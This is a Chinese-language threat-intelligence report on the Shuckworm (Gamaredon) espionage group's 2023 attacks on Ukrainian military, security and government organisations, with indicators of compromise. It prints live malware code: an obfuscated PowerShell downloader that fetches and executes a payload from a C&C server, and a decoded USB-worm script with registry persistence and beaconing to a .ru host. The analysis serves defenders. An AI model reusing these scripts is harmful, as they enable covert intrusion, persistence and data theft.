【威胁情报】Shuckworm:俄罗斯针对乌克兰的无情网络攻击
2023-6-23 13:5:58 Author: Ots安全(查看原文) 阅读量:17 收藏

攻击者非常注重获取军事和安全情报,以支持入侵部队。
Shuckworm 间谍组织继续对乌克兰发动多次网络攻击,最近的目标包括安全部门、军队和政府组织。
在某些情况下,Shuckworm 已成功发起长期入侵,持续时间长达三个月。攻击者多次试图访问和窃取敏感信息,例如有关乌克兰军人死亡、敌人交战和空袭、军火库库存、军事训练等的报告。
为了领先于检测,Shuckworm 反复更新其工具集,推出新版本的已知工具和短期基础设施,以及新添加的工具,例如 USB 传播恶意软件。
Shuckworm(又名 Gamaredon、Armageddon)是一个与俄罗斯有联系的组织,自 2014 年首次出现以来,其行动几乎完全集中在乌克兰。乌克兰官员公开表示,该组织代表俄罗斯联邦安全局 (FSB) 开展活动。
Shuckworm 策略、技术和程序
众所周知,Shuckworm 使用网络钓鱼电子邮件作为初始感染媒介,以访问受害机器并分发恶意软件。攻击者向乌克兰受害者发送带有恶意附件的电子邮件,其中包含各种文件类型的附件,例如:
  • .docx
  • .rar(RAR 存档文件)
  • .sfx(自解压档案)
  • .lnk
  • .hta(HTML 走私文件)
我们观察到的受害者诱饵与武装冲突、刑事诉讼、打击犯罪和保护儿童等有关。
一旦受害者被感染,攻击者就会继续将额外的后门和工具下载到目标机器上。
还观察到 Shuckworm 使用新的 PowerShell 脚本以通过 USB 传播其自定义后门恶意软件 Pterodo。博通旗下赛门铁克的研究人员在 2022 年 4 月发布了有关 Backdoor.Pterodo 的博客,记录了我们如何发现具有相似功能的四个后门变体。这些变体是 Visual Basic 脚本 (VBS) 释放器,它将释放 VBScript 文件,使用计划任务 (shtasks.exe) 来保持持久性,并从命令和控制 (C&C) 服务器下载额外的代码。
最近计划任务的示例包括执行以下命令行:
CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\appdata\local\temp\desert" //e:vbscript //b /dmc /j2k /spl /nffCSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\favorites\jumper.asf" //e:vbscript //b /asf /mdf /nab /apkwscript.exe "C:\Users\[REDACTED]\Contacts\delightful.abk" //e:vbscript //b /cfg /mdm /cfm /mp4
新的 PowerShell 脚本用于首先将自身复制到受感染的机器上,并使用rtk.lnk扩展名创建快捷方式文件。该脚本使用“porn_video.rtf.lnk”、“do_not_delete.rtf.lnk”和“evidence.rtf.lnk”等文件名,试图诱使个人打开这些文件。这些文件名一般是乌克兰语,但也有一些是英文的。
接下来,脚本会枚举所有驱动器,将自身复制到任何可用的可移动磁盘——USB 驱动器。攻击者可能使用这些 USB 驱动器在受害网络之间进行横向移动,并可用于帮助攻击者到达目标组织内的气隙机器。
在最近的活动中,我们还观察到该组织利用合法服务充当 C&C 服务器,包括将 Telegram 消息服务用于其 C&C 基础设施。最近,他们还使用了 Telegram 的微博平台 Telegraph 来存储 C&C 地址。

图 1. 威胁参与者使用 Telegraph 存储 C&C 地址
Shuckworm 往往只在短时间内使用其 C&C 基础设施,这限制了其 C&C 在寻找更多活动或将活动链接在一起时的作用。但是,该组织确实使用具有某些可用于跟踪目的的共性的 SSL 证书。我们相信该组织可能会利用预先配置的图像用于其 C&C 部署。这些数据点可以帮助研究人员识别额外的 C&C 基础设施和 Shuckworm 活动。
赛门铁克还发现了可能是 Giddome 的信息窃取工具,它是一个已知的 Shuckworm 后门,部署到受害者网络上以窃取和泄露感兴趣的数据。
典型的攻击链
下面描述了在该活动中被 Shuckworm 破坏的受害机器上看到的典型攻击链。
在一次攻击中,恶意活动的第一个迹象是用户似乎打开了一个 RAR 存档文件,该文件可能是通过鱼叉式网络钓鱼电子邮件发送的,其中包含恶意文档。
打开文档后,观察到执行恶意PowerShell命令,从攻击者的C&C服务器下载下一阶段的payload:
"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"
最近,赛门铁克观察到 Shuckworm 在其 PowerShell 脚本中利用了更多的 IP 地址。这可能是为了逃避研究人员使用的某些跟踪方法。
Shuckworm 还继续更新其 PowerShell 脚本中使用的混淆技术以试图避免被发现,在 2023 年 1 月至 2023 年 4 月期间每月观察到多达 25 个该组织脚本的新变体。
接下来,执行了一个 VBS 脚本,它是 Shuckworm 的 Pterodo 后门:
CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
在此之后,我们看到似乎正在执行多个类似的脚本。用于此活动的机器似乎包含多个与乌克兰安全部门或政府部门有关的机密文件。
在另一台机器上,我们看到恶意活动似乎是从文件 (foto.safe) 执行的,该文件已被某人插入系统的受感染 USB 密钥丢弃。赛门铁克观察到受感染机器上存在多个文件路径,表明用户已插入受感染的 USB 密钥,例如“usb-накопитель”翻译为“usb-drive”。
foto.safe 文件是 Base64 编码的脚本。
解码后如下所示:
fUNCtIon sET-lnK ($chILd) {$nAMetxt = "foto.sAfe".TolowER();$NAmE = ("кОМПРОМат""КОРЗиНА""СеКРетнО" | GeT-rAnDOm).ToUPPeR();$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt | OUT-STrIng))".TOlower();$sHORTCUT.ArGUMEnTs = $tExt;$sHortCUT.saVE();$mYfIlE$chIlD+"\$naMeTXT"cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE$FIlE=GEt-ITEM $mYfiLE -forCe$FiLe.ATtRiButes='hiDDEN'}
Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp | Out-sTRing) | poweRSHeLL -noPROfILE';coPy-item  .\"fOtO.safe"  -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHpWHile($CoUNT -lE 2){$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";$Drive.naMe | FOreaCH-oBJecT{$CHiLdS = GET-ChilDITem $drivE.nAMefoReach($cHilDs IN $chiLDs){if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy ){sET-lnk $chILds.fUlLName}}IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){SEt-lNK $DRivE.name}}STArt-SLEeP -S 300;}
此 PowerShell 脚本用于将自身复制到受感染的计算机上,然后创建一个链接到 PowerShell 脚本的快捷方式文件。赛门铁克已识别出此脚本的多个变体,可用于指示成功感染或将其他工具下载到受感染的计算机上。 
受害者
这场运动最重要的事情之一是目标,其中包括乌克兰军队、安全、研究和政府组织。据观察,攻击者专注于包含文件名中显示的敏感军事信息的机器,这些信息可能被滥用来支持俄罗斯的动能战争努力。   
大多数此类攻击始于 2023 年 2 月/3 月,攻击者在一些受害机器上一直存在到 5 月。目标组织和机器的部门和性质可能使攻击者能够访问大量敏感信息。在一些组织中有迹象表明,攻击者在组织人力资源部门的机器上,这表明有关在不同组织工作的个人的信息是攻击者的优先事项,等等。
这一活动表明 Shuckworm 对乌克兰的不懈关注仍在继续。很明显,俄罗斯民族国家支持的攻击团体继续优先考虑高价值的乌克兰目标,试图寻找可能有助于其军事行动的数据。

妥协指标

恶意文件f7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d630619231e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096bc62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30c6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c83393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada8596171373458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601acc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8
USB 传播脚本28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c012aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581dbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87a615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df591d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86
创建的 LNK 文件示例7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a
LNK 文件名account.rtf.lnkaccount_card.rtf.lnkapplication.rtf.lnkbank_accоunt.rtf.lnkblank_cap.rtf.lnkbusiness trip.rtf.lnkcompromising_evidence.rtf.lnkconduct.rtf.lnkcuprovod.rtf.lnkdo_not_delete.rtf.lnkdsk.rtf.lnkencouragement.rtf.lnkform_new.rtf.lnkinstructions.rtf.lnkjourney.mdbletter to.rtf.lnklogin_password.docx.lnklogin_password.rtf.lnkmobilization.rtf.lnkmy_documents.rtf.lnkmy_photos.rtf.lnknot_delete.rtf.lnkon_account.rtf.lnkorder.rtf.lnkpetition.rtf.lnkporn_video.rtf.lnkpornography.rtf.lnkpornophoto.rtf.lnkproceedings.rtf.lnkproject_sheet.rtf.lnkreport.docx.lnkreport.rtf.lnkreport_note.rtf.lnkrequest.rtf.lnkresolution.rtf.lnksecret.rtf.lnksecretly.rtf.lnkservice.docx.lnkservice.rtf.lnksources.rtf.lnksupport.rtf.lnkweapons_list.rtf.lnk
最近的 C&C 基础设施 (2023)45.76.141[.]166159.223.112[.]245140.82.56[.]186159.203.164[.]19445.32.94[.]5845.95.232[.]33139.59.109[.]100164.92.245[.]24645.32.101[.]6140.82.18[.]48216.128.140[.]45146.190.127[.]238207.148.74[.]68195.133.88[.]19146.190.60[.]23084.32.190[.]137206.189.154[.]168188.166.4[.]128104.248.54[.]250165.227.76[.]8466.42.104[.]158161.35.95[.]47149.28.125[.]56143.198.50[.]11866.42.126[.]12164.227.72[.]21081.19.140[.]147165.232.77[.]197146.190.117[.]209134.122.51[.]47143.198.152[.]232140.82.47[.]181159.223.102[.]109170.64.188[.]146155.138.194[.]24445.32.88[.]9089.185.84[.]3264.226.84[.]229206.189.14[.]9424.199.84[.]13245.32.41[.]11584.32.188[.]69206.189.128[.]172170.64.168[.]228161.35.238[.]148170.64.138[.]138178.128.86[.]43206.81.28[.]5178.128.231[.]18045.77.115[.]67136.244.65[.]253143.244.190[.]199159.65.176[.]121192.248.154[.]154209.97.175[.]128147.182.240[.]58146.190.212[.]239143.198.135[.]13245.76.202[.]102142.93.108[.]146.101.127[.]147134.209.0[.]136138.68.110[.]19167.99.215[.]50161.35.232[.]11888.216.210[.]3165.227.121[.]87165.227.48[.]59108.61.211[.]25089.185.84[.]48167.172.69[.]12389.185.84[.]50206.189.0[.]13468.183.200[.]0178.128.16[.]17095.179.144[.]161164.92.222[.]845.95.233[.]8078.141.239[.]24149.28.181[.]23224.199.107[.]21845.32.184[.]140167.172.20[.]15984.32.190[.]31164.92.185[.]6084.32.131[.]38137.184.178[.]46206.189.149[.]103157.245.176[.]12345.95.232[.]9245.95.232[.]29170.64.150[.]9089.185.84[.]45140.82.16[.]12084.32.185[.]136134.122.43[.]175195.133.88[.]5584.32.191[.]14778.141.238[.]13645.82.13[.]84159.65.248[.]084.32.34[.]69170.64.146[.]19445.82.13[.]2245.82.13[.]23134.209.33[.]42199.247.8[.]11584.32.128[.]239173.199.70[.]238138.68.174[.]177178.128.213[.]177143.110.180[.]68167.172.144[.]127165.232.165[.]4245.95.232[.]51149.28.98[.]149104.156.230[.]193104.248.86[.]158 134.122.51[.]47 134.209.182[.]221139.59.60[.]191 140.82.11[.]60140.82.47[.]181 140.82.50[.]37143.198.135[.]132143.198.53[.]203 147.182.250[.]33 149.28.130[.]189 149.28.181[.]232 149.28.98[.]149 155.138.194[.]244157.245.69[.]118 158.247.204[.]242159.223.102[.]109159.223.23[.]23 164.92.72[.]212 165.22.72[.]74165.227.76[.]84 165.232.120[.]169167.172.58[.]96 167.71.67[.]58170.64.136[.]186 170.64.140[.]214 170.64.156[.]98 178.128.228[.]252188.166.176[.]39 188.166.7[.]140 193.149.176[.]26 195.133.88[.]55 202.182.116[.]135202.182.98[.]100 206.189.80[.]216 207.148.72[.]173 31.129.22[.]4631.129.22[.]4831.129.22[.]5045.32.101[.]6 45.32.117[.]6245.32.158[.]9645.32.62[.]10045.32.88[.]90 45.82.13[.]84 45.95.232[.]3345.95.232[.]7445.95.233[.]805.199.161[.]2964.226.84[.]229 64.227.64[.]163 66.42.104[.]158 68.183.200[.]078.141.239[.]24 78.153.139[.]781.19.140[.]147 84.32.131[.]4784.32.188[.]1395.179.144[.]161 95.179.245[.]185 216.128.178[.]248

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247499202&idx=3&sn=5010619e291380081024ef44a7e5b553&chksm=9badb489acda3d9ff9581be3c8264765902b18dd1025918c3907a13201c8d5c1d3a732f854ff#rd
如有侵权请联系:admin#unsafe.sh